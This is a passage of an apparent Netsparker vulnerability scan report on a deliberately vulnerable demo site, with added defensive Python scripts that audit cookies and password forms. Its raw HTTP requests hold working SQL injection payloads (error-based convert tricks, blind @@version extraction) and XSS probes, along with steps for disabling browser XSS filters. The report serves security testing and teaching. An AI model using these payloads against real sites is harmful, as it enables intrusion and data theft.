<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
3 Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that:
XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.
Chrome
Open command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security Tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters
Parameter   Type  Value
searchTerm  GET   '+netsparker(9)+'
Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$("#results tr").click(function () { var url = "/Supercar/" + $(this).attr("id"); window.location.href = url; });
$("#searchTerm").val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
IMPORTANT: 1 TOTAL, 1 CONFIRMED
4 Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks, an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- User's session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3E%3Cnet+sparker%3Dnetsparker(0x00043F)%3E

Identification Request:
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response:
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
IMPORTANT: 1 total, 1 confirmed
5 Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he or she can steal users' credentials.
Actions to Take
1. See the remedy for the solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
IMPORTANT: 1 total, 1 confirmed
6 Cookie Not Marked as Secure
Netsparker identified a cookie that is not marked as Secure although it was set over HTTPS.
This means the cookie could be stolen by an attacker who can intercept the traffic, either by passively observing a plain-text request or following a successful man-in-the-middle attack.
Impact
Without the Secure flag the browser will also send this cookie over plain HTTP connections, so if the cookie is important (such as a session cookie) an attacker positioned on the network can capture it and hijack the victim's session. An attacker who can carry out a man-in-the-middle attack does not even need to wait for a plain-text request: he or she can force the victim's browser to make an HTTP request to the site and read the cookie from it.
Actions to Take
1. See the remedy for the solution.
2. Mark all cookies used within the application as Secure. (If a cookie is not related to authentication and does not carry any personal information, you do not have to mark it as Secure.)
Remedy
Mark all cookies used within the application as Secure.
Required Skills for Successful Exploitation
To exploit this issue the attacker needs to be able to intercept traffic. This generally requires access to the victim's network or to the web server's network. Attackers need to understand layer 2, have physical access to systems that act as waypoints for the traffic, or have gained local access to a system between the victim and the web server.
External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
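The check below is an added example, not part of the Netsparker report or of the Supercar Showdown application. It parses the three Set-Cookie headers that the report's own evidence for this finding (6.1) shows in the 302 response to POST /Account/Login and reports what a reviewer would flag: none of the three carries Secure or HttpOnly, and the Password cookie is the base64 encoding of "3", which is exactly the password posted in that login request. The AuthCookie value is shortened here; the helper names are my own.

```python
import binascii
from base64 import b64decode

# The three Set-Cookie values from the 302 response to POST /Account/Login in
# finding 6.1, copied from the report (AuthCookie value shortened here).
SET_COOKIE_HEADERS = [
    "AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2...; "
    "expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
]


def parse_set_cookie(header):
    """Split one Set-Cookie header into name, value and lower-cased attributes.

    Attribute keys map to their value; bare flags such as Secure and HttpOnly
    map to an empty string so that membership tests work for both kinds.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(header):
    """Return the problems with one Set-Cookie header as a list of strings."""
    cookie = parse_set_cookie(header)
    issues = []
    if "secure" not in cookie["attrs"]:
        # Finding 6: the browser will also send it on plain http:// requests.
        issues.append("not marked Secure")
    if "httponly" not in cookie["attrs"]:
        # Readable by injected script, which matters given findings 4 and 9.
        issues.append("not marked HttpOnly")
    if cookie["name"].lower() == "password":
        try:
            decoded = b64decode(cookie["value"], validate=True).decode("utf-8")
            issues.append("stores the password itself (base64 of %r)" % decoded)
        except (binascii.Error, UnicodeDecodeError):
            issues.append("stores something under the name Password")
    return issues


def audit_response(set_cookie_headers):
    """Map cookie name -> issues for every Set-Cookie header in one response."""
    return {parse_set_cookie(h)["name"]: audit_cookie(h) for h in set_cookie_headers}


if __name__ == "__main__":
    for name, issues in audit_response(SET_COOKIE_HEADERS).items():
        print(name, "->", "; ".join(issues) or "ok")
```

In ASP.NET the equivalent fix is either per cookie (HttpCookie.Secure and HttpCookie.HttpOnly set to true) or site-wide in web.config with `<httpCookies requireSSL="true" httpOnlyCookies="true" />`; a Password cookie should simply not exist.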
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request:
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
IMPORTANT: 1 total
7 Out-of-date Version (Microsoft SQL Server)
Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.
Impact
Since this is an old version of the software, it may be vulnerable to publicly known attacks.
Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification
OWASP 2010-A6, OWASP 2013-A9, PCI v2.0-6.1, PCI v3.0-6.1, CAPEC-310
7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: result is based on the 18/08/2014 vulnerability database content.
Note that the version banner extracted through the SQL injection in finding 2 identifies the back end as Microsoft SQL Azure, a hosted service whose patch level is controlled by the platform rather than by the application owner; the comparison against an on-premises SQL Server 2014 build above is therefore informational, and the version itself was only obtainable because of the injection.
Request:
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
MEDIUM: 1 total, 1 confirmed
8 Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact
If an attacker can carry out a man-in-the-middle attack, he or she may be able to capture the credentials by injecting JavaScript into this page or by rewriting the form's action before the page reaches the browser, so that the user's password is posted to a server the attacker controls. Even though the form's target page is HTTPS, this does not protect against a man-in-the-middle attack, because the page that contains the form was itself delivered unprotected.
This issue is important because it negates the use of SSL as a privacy protection barrier.
Actions to Take
1. See the remedy for the solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
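Findings 5 and 8 are two outcomes of the same check: where does a form that contains a password field post to, and over what scheme was the page carrying it fetched? The function below is an added example (not from the report or the site) that reproduces that decision on two constructed HTML fragments modelled on the report's evidence: the Register page fetched over http:// whose form posts to http:// (finding 5.1), and the Login page fetched over http:// whose form posts to https:// (finding 8.1). The Login field names Email and Password are the ones in the captured login request; the Register fragment's field names and the helper names are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collects every <form> on a page with its action and input types."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "input_types": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["input_types"].append((attrs.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(page_url, body):
    """Return (finding, resolved action URL) for each password form on a page.

    Mirrors the report's two checks, most severe first:
    - 'Password Transmitted over HTTP': the form's action resolves to http://,
      so the credential itself crosses the wire in clear (finding 5).
    - 'Critical Form Served over HTTP': the action is https:// but the page
      holding the form came over http://, so a man-in-the-middle can rewrite
      the action or inject script before the browser sees it (finding 8).
    """
    parser = _FormCollector()
    parser.feed(body)
    findings = []
    for form in parser.forms:
        if "password" not in form["input_types"]:
            continue
        action = urljoin(page_url, form["action"])  # relative actions inherit the page scheme
        if urlsplit(action).scheme != "https":
            findings.append(("Password Transmitted over HTTP", action))
        elif urlsplit(page_url).scheme != "https":
            findings.append(("Critical Form Served over HTTP", action))
    return findings


# Constructed fragments modelled on the two pages in the report (the real
# responses are longer and truncated in the report).
REGISTER_HTML = """
<form action="http://hackyourselffirst.troyhunt.com/Account/Register" method="post">
  <input type="text" name="Email"><input type="password" name="Password">
</form>"""
LOGIN_HTML = """
<form action="https://hackyourselffirst.troyhunt.com/Account/Login" method="post">
  <input type="text" name="Email"><input type="password" name="Password">
  <input type="checkbox" name="RememberMe">
</form>"""

if __name__ == "__main__":
    print(audit_forms("http://hackyourselffirst.troyhunt.com/Account/Register", REGISTER_HTML))
    print(audit_forms("http://hackyourselffirst.troyhunt.com/Account/Login", LOGIN_HTML))
```

Serving the page over HTTPS clears both findings only if the http:// URL can no longer be reached: redirect every http:// request to https:// and send a Strict-Transport-Security header (RFC 6797) so returning browsers never issue the plain-text request in the first place.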
8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request:
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM: 3 total
9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which would allow an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This opens several different attack opportunities, most commonly hijacking the current session of the user or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. It happens because input entered by a user is interpreted as HTML, JavaScript or VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it only lets the attacker act as other users, attacking an administrator can give full control over the application.
Although Netsparker believes there is cross-site scripting here, it could not confirm it. We strongly recommend investigating the issue manually to determine whether it is cross-site scripting that needs to be addressed.
Impact
